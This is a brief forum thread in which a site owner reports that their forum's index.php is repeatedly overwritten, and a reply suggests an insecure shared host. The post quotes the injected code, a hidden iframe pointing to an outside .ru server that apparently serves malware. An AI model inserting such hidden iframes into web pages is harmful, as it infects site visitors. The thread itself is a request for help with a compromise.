Okay so about every 12 hours my index.php file on me /forums/ url gets rewritten... I don't know. I think it goes like that. Nobody can access the index.php but they can access anything else on the site.

I have not installed any recent mods lately, this jsut came from nowhere. My admin pal said that he got a trojan virus pop-up. I have cleaned up lots of stuff on my server hoping things would change. Nothing working yet. This came randomly. I am the only super admin on the site and this isn't a spam site so there's nothing I could have done that would possibly ruin anything.

The source on the index when it messes up becomes this:

<iframe src="http://3e0.ru:8080/index.php" width=193 height=159 style="visibility: hidden"></iframe>

NOTE: Never ever seen that URL ever.... Not related to my site.

Are you on hsared hosting?

Most likely the server is not very secure and someone can change the files from the commandline or another infected site on the same server.
